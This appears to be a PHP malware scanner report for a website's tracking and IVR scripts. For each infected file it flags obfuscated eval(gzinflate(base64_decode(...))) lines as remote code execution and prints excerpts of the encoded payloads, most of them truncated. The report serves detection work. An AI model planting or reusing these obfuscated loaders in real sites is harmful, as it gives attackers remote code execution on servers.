<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAL1ba3PbuJL9PKnKf8CoXCsqK0t2ambrrjN2VpHpWHVlyVePZLIzsy6agiyuKZKXpOx4U/7vexog+ARlW5M7qsSiCKBfaJzuBsHXrxg+3TevxXffDx5C52YVM8NusbcHB/+5//bg8IDN7h3X8dts4Nmd169k30serp0ocnyPORFb8ZBfP7Cb0PJivmizZcg585fMXlnhDW+z2GeW98ACHka+Jwn417HleI53wyxmgzF1j1egFfnL+N4KOUYsmBVFvu1YIMoWvr1Zcy+2YkfRWDouj5gRrzhrTJNhjZZgt+CWyxyPUZtqYvdOvPI3sRwc8igOHZuotdHTdjcLkibpw1xn7UhegoawS0SUNxFvSwokdput/YWzpG8uVA02164Trdps4RD9602MmxHdtLmHoaRW1w9ZxF03JeNADaF/JqzoSPwCsnSc2E5IcL/y19RXDk+...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/twilio_dial_number.php

Size: 3.31 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAOVaW3PbNhZ+tmf8HxCMxiQ7shy/dW3Ljuuou55tk6wspw+eDEOTkMWEIlkSjOzZyX/vOQBIAhR1s9VstmUmFonLwcG54TsA9nYnzAtYZluXScxZzA/4Y8qOCWcP/PBhGlnOyd5uxn4vwoy5SewzYhU8jHrpJLWgZm+34/k8TGLSJ3aY54zbHXc4+M/N4Hp0a8kq64PjkHPSUk6OCQ3Y2CsiTgWxfBZyf0JsRdQh/93b3fG9nNXtjqFk5/wM/54OWZ4mcc7EF4Hn9HXoRWTK+CQJ+jRNck6JJNWnp+fAM2H+JCFBmMXelNn5j+49465fZBnM3J2xu9S7Z26RhTaw3CPWIZ+FUZi4Ofd4kbu+F0V3nv8ZZ39e5CwLg74F7V5pc5PFMDfovu9N0xMvTecaQZn14YScn1GSMT/JgFmeFYwSHIFlV4HBLs/CqT3h0yhPmQ8T9Cdelmtypj9nyRR7UpC0oHq2SW+e6H1PD1G...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOVaW3PbNhZ+tmf8HxCMxiQ7shy/dW3Ljuuou55tk6wspw+eDEOTkMWEIlkSjOzZyX/vOQBIAhR1s9VstmUmFonLwcG54TsA9nYnzAtYZluXScxZzA/4Y8qOCWcP/PBhGlnOyd5uxn4vwoy5SewzYhU8jHrpJLWgZm+34/k8TGLSJ3aY54zbHXc4+M/N4Hp0a8kq64PjkHPSUk6OCQ3Y2CsiTgWxfBZyf0JsRdQh/93b3fG9nNXtjqFk5/wM/54OWZ4mcc7EF4Hn9HXoRWTK+CQJ+jRNck6JJNWnp+fAM2H+JCFBmMXelNn5j+49465fZBnM3J2xu9S7Z26RhTaw3CPWIZ+FUZi4Ofd4kbu+F0V3nv8ZZ39e5CwLg74F7V5pc5PFMDfovu9N0xMvTecaQZn14YScn1GSMT/JgFmeFYwSHIFlV4HBLs/CqT3h0yhPmQ8...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOVaW3PbNhZ+tmf8HxCMxiQ7shy/dW3Ljuuou55tk6wspw+eDEOTkMWEIlkSjOzZyX/vOQBIAhR1s9VstmUmFonLwcG54TsA9nYnzAtYZluXScxZzA/4Y8qOCWcP/PBhGlnOyd5uxn4vwoy5SewzYhU8jHrpJLWgZm+34/k8TGLSJ3aY54zbHXc4+M/N4Hp0a8kq64PjkHPSUk6OCQ3Y2CsiTgWxfBZyf0JsRdQh/93b3fG9nNXtjqFk5/wM/54OWZ4mcc7EF4Hn9HXoRWTK+CQJ+jRNck6JJNWnp+fAM2H+JCFBmMXelNn5j+49465fZBnM3J2xu9S7Z26RhTaw3CPWIZ+FUZi4Ofd4kbu+F0V3nv8ZZ39e5CwLg74F7V5pc5PFMDfovu9N0xMvTecaQZn14YScn1GSMT/JgFmeFYwSHIFlV4HBLs/CqT3h0yhPmQ8...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/twilio_header.php

Size: 3.55 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO1c/2/TSBb/GST+h6lV4QSVhtPtSogqQGgD5FTabpKCVghZjj1pRjh2GI9bcrf93++9+eKMv6Upe9wWNpVok/jN+/4+78Xj4cH9B/c7HfIyFT4XJI3ZYkHFg/ucfskYp14SB5SEjMf+nLY87/XguO95bbJP3M6I8ksW0LQzvmIRS/YXs4V78ADYsSlp7YR0ymIattzxh8Hx4NTrnZ0dDw5748HpiXfSe9d32+1nSEzg5yJKJn5Edo9eyUsH6lPFoZnBHnF7h2PvvTd+O+z3PReUmoe/tgwXVNLxHPj9ctcb9UcjWPjRzVLKPRa6n9pSVRqHbLpSeprFgWBJ7NGvLBVpy02fehdUeEHGOY2Fd0UnC/+CehlnoD/5jzGg8+iRekEekfGMpcQwIpyKjMcpETNKzocDkkyJZkY0MxIlfkhDwmIy4ckV6JezeqlWk1RwFl8AZ0oyHum3hqqjXuQSm1VuSY2J/tnFj8+Hx6R...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO1c/2/TSBb/GST+h6lV4QSVhtPtSogqQGgD5FTabpKCVghZjj1pRjh2GI9bcrf93++9+eKMv6Upe9wWNpVok/jN+/4+78Xj4cH9B/c7HfIyFT4XJI3ZYkHFg/ucfskYp14SB5SEjMf+nLY87/XguO95bbJP3M6I8ksW0LQzvmIRS/YXs4V78ADYsSlp7YR0ymIattzxh8Hx4NTrnZ0dDw5748HpiXfSe9d32+1nSEzg5yJKJn5Edo9eyUsH6lPFoZnBHnF7h2PvvTd+O+z3PReUmoe/tgwXVNLxHPj9ctcb9UcjWPjRzVLKPRa6n9pSVRqHbLpSeprFgWBJ7NGvLBVpy02fehdUeEHGOY2Fd0UnC/+CehlnoD/5jzGg8+iRekEekfGMpcQwIpyKjMcpETNKzocDkkyJZkY0MxIlfkhDwmIy4ckV6JezeqlWk1RwFl8...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO1c/2/TSBb/GST+h6lV4QSVhtPtSogqQGgD5FTabpKCVghZjj1pRjh2GI9bcrf93++9+eKMv6Upe9wWNpVok/jN+/4+78Xj4cH9B/c7HfIyFT4XJI3ZYkHFg/ucfskYp14SB5SEjMf+nLY87/XguO95bbJP3M6I8ksW0LQzvmIRS/YXs4V78ADYsSlp7YR0ymIattzxh8Hx4NTrnZ0dDw5748HpiXfSe9d32+1nSEzg5yJKJn5Edo9eyUsH6lPFoZnBHnF7h2PvvTd+O+z3PReUmoe/tgwXVNLxHPj9ctcb9UcjWPjRzVLKPRa6n9pSVRqHbLpSeprFgWBJ7NGvLBVpy02fehdUeEHGOY2Fd0UnC/+CehlnoD/5jzGg8+iRekEekfGMpcQwIpyKjMcpETNKzocDkkyJZkY0MxIlfkhDwmIy4ckV6JezeqlWk1RwFl8...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/twilio_record_audio.php

Size: 551.00 B Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAHWRX0vDMBTF3wf7DpcgdhPX6ttw7fogE8UHdX+eRErW3q3BNok3qV2/vclWxl4MBBLO79ybezIclMgLpFHwqKRFaSe20/gAFg82OtRVMJ4NB4Q/jSCEwLaiEio7WUJd6sCpmJcKgjh1NPwiGaFkwu7DOwYoc1UIuU/YZv00mTJI594wHFw1VEEChSDJaxyZabZHm+UNkXtB1uJW8z1mDYnR2PfvcWMpI9QVz3HEIiHzqimQ3QJz2yMeTefDQbxEo5U06M7gVrzi3fwZq0qFsMRcUQGdaghqNMb1Ab6zSGBLhC2iDuGdnHC8G8sJvrGDtkQJOyGFKbEI48hX7Iv3Fa2oUTXWTe4G57k9phCnLiM4BuQfOHMBRHTkM94UQvkI0/alSC7BbLn42CxW68/AKcGXN13zWs9yVWsuu3/ps37hOTVzX/Cv64I4+Vg/55t8xS5hNwwin2l0DvUP7bZGezMCAAA='

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAHWRX0vDMBTF3wf7DpcgdhPX6ttw7fogE8UHdX+eRErW3q3BNok3qV2/vclWxl4MBBLO79ybezIclMgLpFHwqKRFaSe20/gAFg82OtRVMJ4NB4Q/jSCEwLaiEio7WUJd6sCpmJcKgjh1NPwiGaFkwu7DOwYoc1UIuU/YZv00mTJI594wHFw1VEEChSDJaxyZabZHm+UNkXtB1uJW8z1mDYnR2PfvcWMpI9QVz3HEIiHzqimQ3QJz2yMeTefDQbxEo5U06M7gVrzi3fwZq0qFsMRcUQGdaghqNMb1Ab6zSGBLhC2iDuGdnHC8G8sJvrGDtkQJOyGFKbEI48hX7Iv3Fa2oUTXWTe4G57k9phCnLiM4BuQfOHMBRHTkM94UQvkI0/alSC7BbLn42CxW68/AKcGXN13zWs9yVWsuu3/ps37hOTVzX/Cv64I4+Vg/55t8xS5...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAHWRX0vDMBTF3wf7DpcgdhPX6ttw7fogE8UHdX+eRErW3q3BNok3qV2/vclWxl4MBBLO79ybezIclMgLpFHwqKRFaSe20/gAFg82OtRVMJ4NB4Q/jSCEwLaiEio7WUJd6sCpmJcKgjh1NPwiGaFkwu7DOwYoc1UIuU/YZv00mTJI594wHFw1VEEChSDJaxyZabZHm+UNkXtB1uJW8z1mDYnR2PfvcWMpI9QVz3HEIiHzqimQ3QJz2yMeTefDQbxEo5U06M7gVrzi3fwZq0qFsMRcUQGdaghqNMb1Ab6zSGBLhC2iDuGdnHC8G8sJvrGDtkQJOyGFKbEI48hX7Iv3Fa2oUTXWTe4G57k9phCnLiM4BuQfOHMBRHTkM94UQvkI0/alSC7BbLn42CxW68/AKcGXN13zWs9yVWsuu3/ps37hOTVzX/Cv64I4+Vg/55t8xS5...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/twilio_status_callback.php

Size: 1.62 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAJVWYW/bNhD97AD5D1fBqOzNspOhn+bGhue4bbAUzWy3G5AZAi2dLDayqJFUHGPIf9+RlGPFcbstH4yIfLx7vHt85OlJr3fDlOL5CnQqIdW6gJ/OzkDcQYosRglagLhHKXmMBEF4c/YG6FNIWG5hUwTLTKwCh+0WaXF64v5veR/m85veeffcxvv0q9fun56cUr4Zau3yIUQi15hr0FuBIBKIRVSu7YCAPz5ed2AmOhCxLEOpQKWizGLQEhkBUq6ARZGQMQXLtk95/bGLGehtgT+Dxgfde1hnvksv8a+SSwxFHiF4lD7hK0Pb6x/OlZpnx2fi5dFxX294xkW4r4VvUzbjJVxAjhu4/KXlWPAEWlwp1K1mOJ389nkym9/6hgxKpFBhztboL9rw+jW8gJUKZchjmm7D36cnjebBOsqlJV9/P3LfLkxZvsLQlTck9uvMLi7Rkmw0lU5pgPgHg6hUWqwnDxiVGlvebHI9Gc/...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAJVWYW/bNhD97AD5D1fBqOzNspOhn+bGhue4bbAUzWy3G5AZAi2dLDayqJFUHGPIf9+RlGPFcbstH4yIfLx7vHt85OlJr3fDlOL5CnQqIdW6gJ/OzkDcQYosRglagLhHKXmMBEF4c/YG6FNIWG5hUwTLTKwCh+0WaXF64v5veR/m85veeffcxvv0q9fun56cUr4Zau3yIUQi15hr0FuBIBKIRVSu7YCAPz5ed2AmOhCxLEOpQKWizGLQEhkBUq6ARZGQMQXLtk95/bGLGehtgT+Dxgfde1hnvksv8a+SSwxFHiF4lD7hK0Pb6x/OlZpnx2fi5dFxX294xkW4r4VvUzbjJVxAjhu4/KXlWPAEWlwp1K1mOJ389nkym9/6hgxKpFBhztboL9rw+jW8gJUKZchjmm7D36cnjebBOsqlJV9/P3LfLkxZvsLQlTck9uvMLi7...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAJVWYW/bNhD97AD5D1fBqOzNspOhn+bGhue4bbAUzWy3G5AZAi2dLDayqJFUHGPIf9+RlGPFcbstH4yIfLx7vHt85OlJr3fDlOL5CnQqIdW6gJ/OzkDcQYosRglagLhHKXmMBEF4c/YG6FNIWG5hUwTLTKwCh+0WaXF64v5veR/m85veeffcxvv0q9fun56cUr4Zau3yIUQi15hr0FuBIBKIRVSu7YCAPz5ed2AmOhCxLEOpQKWizGLQEhkBUq6ARZGQMQXLtk95/bGLGehtgT+Dxgfde1hnvksv8a+SSwxFHiF4lD7hK0Pb6x/OlZpnx2fi5dFxX294xkW4r4VvUzbjJVxAjhu4/KXlWPAEWlwp1K1mOJ389nkym9/6hgxKpFBhztboL9rw+jW8gJUKZchjmm7D36cnjebBOsqlJV9/P3LfLkxZvsLQlTck9uvMLi7...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/twilio_test_voice.php

Size: 495.00 B Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAH2R32vCMBDHnw3kfziCkBambm9DW/sw3Ntg8wd7GCKhnhpok9JkYtn2vy+pa9ehLBBI7r73uW8ulBxQbLEM+INWFpUd2KrAMVg82dEpz3g4oQTTgwYeJe4ORyyN1Cpmd8NbBqhSvZVqH7PV8nFwzyCZcldASf+oZYoQgzQGbdDfzGcvq9li+cbrBF+HkMBlFMbAcqGYY/QzofbvYn8V0uQuOL8Jj8IzyT/GUToyH+Hrs9NOH2PLTYlFJlIM2OcruwHmdqsIJ//Jn67JKZE7CDAvbBXUPsIQPijpNZ7Yc4bCoBukxRKMzrEePexkaezQu++1o2wm0+t6+HnjFyXJlJJojqbQyqA7g1vRQlRQ18csSopDAfVfnpET91sMGtZfQROtNdNuxtvz0Wjk2L7lqO35DdRMNFxNAgAA'

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAH2R32vCMBDHnw3kfziCkBambm9DW/sw3Ntg8wd7GCKhnhpok9JkYtn2vy+pa9ehLBBI7r73uW8ulBxQbLEM+INWFpUd2KrAMVg82dEpz3g4oQTTgwYeJe4ORyyN1Cpmd8NbBqhSvZVqH7PV8nFwzyCZcldASf+oZYoQgzQGbdDfzGcvq9li+cbrBF+HkMBlFMbAcqGYY/QzofbvYn8V0uQuOL8Jj8IzyT/GUToyH+Hrs9NOH2PLTYlFJlIM2OcruwHmdqsIJ//Jn67JKZE7CDAvbBXUPsIQPijpNZ7Yc4bCoBukxRKMzrEePexkaezQu++1o2wm0+t6+HnjFyXJlJJojqbQyqA7g1vRQlRQ18csSopDAfVfnpET91sMGtZfQROtNdNuxtvz0Wjk2L7lqO35DdRMNFxNAgAA')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAH2R32vCMBDHnw3kfziCkBambm9DW/sw3Ntg8wd7GCKhnhpok9JkYtn2vy+pa9ehLBBI7r73uW8ulBxQbLEM+INWFpUd2KrAMVg82dEpz3g4oQTTgwYeJe4ORyyN1Cpmd8NbBqhSvZVqH7PV8nFwzyCZcldASf+oZYoQgzQGbdDfzGcvq9li+cbrBF+HkMBlFMbAcqGYY/QzofbvYn8V0uQuOL8Jj8IzyT/GUToyH+Hrs9NOH2PLTYlFJlIM2OcruwHmdqsIJ//Jn67JKZE7CDAvbBXUPsIQPijpNZ7Yc4bCoBukxRKMzrEePexkaezQu++1o2wm0+t6+HnjFyXJlJJojqbQyqA7g1vRQlRQ18csSopDAfVfnpET91sMGtZfQROtNdNuxtvz0Wjk2L7lqO35DdRMNFxNAgAA'),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/util.php

Size: 18.17 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO09aXfbRpKfPe/Nf+hgOANqh4ckn5EtJRRFHREpKSQlx3a8fCDRImGBAINDh2f837eqD5wNEpSdzO6+0BYPdFV1dVV1dfX917888ehvoeXRketMKNGCO8u23MZittBe//UvBF7p9AH1bq0J9ZvDFGCGijkuSJi4zrU1lYn4D7OoLDzXDCfB6JZ6vuU6ZJdsb7/OpJnjRPLz7dcRsng68gMPUrTtxsvGpmS+Mg4t2xw54XxMvV1t+/ttLUK0rqvfWb5Pg2ql32mf9w9Ozo4GGxs8kSHHj4Fw4IU0wm02Scs0LWdK/IlnLQJC7+kkDJC5wJpTNwwaZOiShUdvqRMQkxqm7U5uGhH2081N4lMQh+mT6nMyt5wwoL7I/EdgaoR0RrY1t4IqAG8k2RZcjwad/lWn/0Hvd1rd0cF5+7LXORuO+ufnQ/1jqiARZAYIihWlaXkq2sdYyqFnj65d26QoZD8cg7Sr4iNJ4ufLzmA...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09aXfbRpKfPe/Nf+hgOANqh4ckn5EtJRRFHREpKSQlx3a8fCDRImGBAINDh2f837eqD5wNEpSdzO6+0BYPdFV1dVV1dfX917888ehvoeXRketMKNGCO8u23MZittBe//UvBF7p9AH1bq0J9ZvDFGCGijkuSJi4zrU1lYn4D7OoLDzXDCfB6JZ6vuU6ZJdsb7/OpJnjRPLz7dcRsng68gMPUrTtxsvGpmS+Mg4t2xw54XxMvV1t+/ttLUK0rqvfWb5Pg2ql32mf9w9Ozo4GGxs8kSHHj4Fw4IU0wm02Scs0LWdK/IlnLQJC7+kkDJC5wJpTNwwaZOiShUdvqRMQkxqm7U5uGhH2081N4lMQh+mT6nMyt5wwoL7I/EdgaoR0RrY1t4IqAG8k2RZcjwad/lWn/0Hvd1rd0cF5+7LXORuO+ufnQ/1jqiARZAYIihWlaXk...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09aXfbRpKfPe/Nf+hgOANqh4ckn5EtJRRFHREpKSQlx3a8fCDRImGBAINDh2f837eqD5wNEpSdzO6+0BYPdFV1dVV1dfX917888ehvoeXRketMKNGCO8u23MZittBe//UvBF7p9AH1bq0J9ZvDFGCGijkuSJi4zrU1lYn4D7OoLDzXDCfB6JZ6vuU6ZJdsb7/OpJnjRPLz7dcRsng68gMPUrTtxsvGpmS+Mg4t2xw54XxMvV1t+/ttLUK0rqvfWb5Pg2ql32mf9w9Ozo4GGxs8kSHHj4Fw4IU0wm02Scs0LWdK/IlnLQJC7+kkDJC5wJpTNwwaZOiShUdvqRMQkxqm7U5uGhH2081N4lMQh+mT6nMyt5wwoL7I/EdgaoR0RrY1t4IqAG8k2RZcjwad/lWn/0Hvd1rd0cF5+7LXORuO+ufnQ/1jqiARZAYIihWlaXk...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/ivr/data.php

Size: 675.00 B Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:51 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAG2Sb2vbMBDGX7vQ76CJgBVo7fdLGtjSMgJjK6TvyhCydLGPKJIqyWyj7LvvbMdtBgML7Lufnvvz+Prq+qqo620H+sgOPjLt3QHbqqIwHpj4cEALEn5hyknwqqrRadsbqM9c6AJfLtkr4YVBEHzdbJ46iMAwMeUYxOhjxbYjzQYx5nymSr0zFXu0oBKwCLfoUlbWsqmDrHRmqQ/Bx1yt62bDlyuq8IdOgpTQO0l4zGIMR3jpMYL0ToMoL3rsM9qhw/I/WGO9Pmpv4B2gZxFUC+yOcWVO6IYPPmQWpqGgg5/s/vNUc6H9KSiHkChB6dtNC/mTtds5LN4kaR5iTr/Ti5X07kBnwam6sp1Pmd+U0ftc3pRTExOXwBImTSNK4qzMUekjupYiIzaa9kh7s14ZNrqXZscwJchiIfcP+/3u+7fnsk8QJZryx2xUB8pAFPwrNZFpmR+Z9S26ycyhiYIMz/PGz7qz7JeHp+dS70Y...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAG2Sb2vbMBDGX7vQ76CJgBVo7fdLGtjSMgJjK6TvyhCydLGPKJIqyWyj7LvvbMdtBgML7Lufnvvz+Prq+qqo620H+sgOPjLt3QHbqqIwHpj4cEALEn5hyknwqqrRadsbqM9c6AJfLtkr4YVBEHzdbJ46iMAwMeUYxOhjxbYjzQYx5nymSr0zFXu0oBKwCLfoUlbWsqmDrHRmqQ/Bx1yt62bDlyuq8IdOgpTQO0l4zGIMR3jpMYL0ToMoL3rsM9qhw/I/WGO9Pmpv4B2gZxFUC+yOcWVO6IYPPmQWpqGgg5/s/vNUc6H9KSiHkChB6dtNC/mTtds5LN4kaR5iTr/Ti5X07kBnwam6sp1Pmd+U0ftc3pRTExOXwBImTSNK4qzMUekjupYiIzaa9kh7s14ZNrqXZscwJchiIfcP+/3u+7fnsk8QJZryx2xUB8pAFPwrNZF...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAG2Sb2vbMBDGX7vQ76CJgBVo7fdLGtjSMgJjK6TvyhCydLGPKJIqyWyj7LvvbMdtBgML7Lufnvvz+Prq+qqo620H+sgOPjLt3QHbqqIwHpj4cEALEn5hyknwqqrRadsbqM9c6AJfLtkr4YVBEHzdbJ46iMAwMeUYxOhjxbYjzQYx5nymSr0zFXu0oBKwCLfoUlbWsqmDrHRmqQ/Bx1yt62bDlyuq8IdOgpTQO0l4zGIMR3jpMYL0ToMoL3rsM9qhw/I/WGO9Pmpv4B2gZxFUC+yOcWVO6IYPPmQWpqGgg5/s/vNUc6H9KSiHkChB6dtNC/mTtds5LN4kaR5iTr/Ti5X07kBnwam6sp1Pmd+U0ftc3pRTExOXwBImTSNK4qzMUekjupYiIzaa9kh7s14ZNrqXZscwJchiIfcP+/3u+7fnsk8QJZryx2xUB8pAFPwrNZF...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/ivr/i.php

Size: 8.89 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:51 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO09/XPbNrI/qzP+H1DGV1KxJNrJtNeTLWfSJG1z03y82O3Nzc09D0XCEh2KZEnKss/1//52Fx8EvyQ5z+5r50WJZQlYLBb7hQWwhHe+2IF/Pdd9Mef+R3aeZMxP4vNwNhpBcXjOnC/Pw4if8aswL3LHGo3cMPajZcBdCZfOU6vfZzcA3gtC7lhH0+PTOc84C3PmxYxnWZKN2AuCZoiMxUkBPS3jYMTeR9zLOcv4MIzzwosiJigoPL9g+TJNk6wYHbnTY6t/CD3cwk/O8zxM4jMAzwqHijP+6zLM+FkS+9yxDRqXRRghhTaBif+7qTfjbMIsL1iEMX6xsHI3mEJhzFfs5XeAtUdceekV3hQJzHlRhPEsR0AgDyAX1/mv0Rl8jrlfOLsvvzv78d3J6QA//Hzy6gN9eP/85IR6FsA5jwD2LJgS+Nvnb14xrJUSeA9MiBIvYCSKXLE/zKFvZ/fs5NXJyet3b/9lL3OenYW...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09/XPbNrI/qzP+H1DGV1KxJNrJtNeTLWfSJG1z03y82O3Nzc09D0XCEh2KZEnKss/1//52Fx8EvyQ5z+5r50WJZQlYLBb7hQWwhHe+2IF/Pdd9Mef+R3aeZMxP4vNwNhpBcXjOnC/Pw4if8aswL3LHGo3cMPajZcBdCZfOU6vfZzcA3gtC7lhH0+PTOc84C3PmxYxnWZKN2AuCZoiMxUkBPS3jYMTeR9zLOcv4MIzzwosiJigoPL9g+TJNk6wYHbnTY6t/CD3cwk/O8zxM4jMAzwqHijP+6zLM+FkS+9yxDRqXRRghhTaBif+7qTfjbMIsL1iEMX6xsHI3mEJhzFfs5XeAtUdceekV3hQJzHlRhPEsR0AgDyAX1/mv0Rl8jrlfOLsvvzv78d3J6QA//Hzy6gN9eP/85IR6FsA5jwD2LJgS+Nvnb14xrJUSeA9MiBI...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09/XPbNrI/qzP+H1DGV1KxJNrJtNeTLWfSJG1z03y82O3Nzc09D0XCEh2KZEnKss/1//52Fx8EvyQ5z+5r50WJZQlYLBb7hQWwhHe+2IF/Pdd9Mef+R3aeZMxP4vNwNhpBcXjOnC/Pw4if8aswL3LHGo3cMPajZcBdCZfOU6vfZzcA3gtC7lhH0+PTOc84C3PmxYxnWZKN2AuCZoiMxUkBPS3jYMTeR9zLOcv4MIzzwosiJigoPL9g+TJNk6wYHbnTY6t/CD3cwk/O8zxM4jMAzwqHijP+6zLM+FkS+9yxDRqXRRghhTaBif+7qTfjbMIsL1iEMX6xsHI3mEJhzFfs5XeAtUdceekV3hQJzHlRhPEsR0AgDyAX1/mv0Rl8jrlfOLsvvzv78d3J6QA//Hzy6gN9eP/85IR6FsA5jwD2LJgS+Nvnb14xrJUSeA9MiBI...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/ivr/index.php

Size: 20.02 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:51 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO19/XfbRq7oz8o5+R8mTG4p1/qwnbbbyh85aZxu/V6d5MbO9uzJ7dPSEm0zkUiWpOL4Zv2/PwDzTQ4pynaatBvt1pFIDAaDwWAwGAzm7p27d4bDJ+fh5C07TTI2SeLT6GwwuHsnOmXde6fRLByH76O8yLveYDCM4slsMQ2HAiw9T721Nfbh7p3ONAq73s7J3vF5mIUsylkQszDLkmzAnhAwQ1wsTgqoZxFPB+zFLAzykGVhP4rzIpjNGK+/CCYFyxdpmmTFYGd4suetbd+9c3X3Th7meZTEYwDOii4+zMLfF1EWjpN4EnZ9g75FEc2QOh+h8H8P0uAsZLvMC6bzKMYfHrx5MD2BZ3F4wfZ/JITD4X5QBCdIVx4WRRSf5QAFRAHY/DL/fTaG73E4KboP9n8c//z86LiHX14dPX1JX148PjpCPBw2D2cAOp6eEPSzx4dPe4hL0jQcvoDGz5JgyqgDcsH0KIe6uw/GR0+...

Exploit execution Line: 3 Dangerous

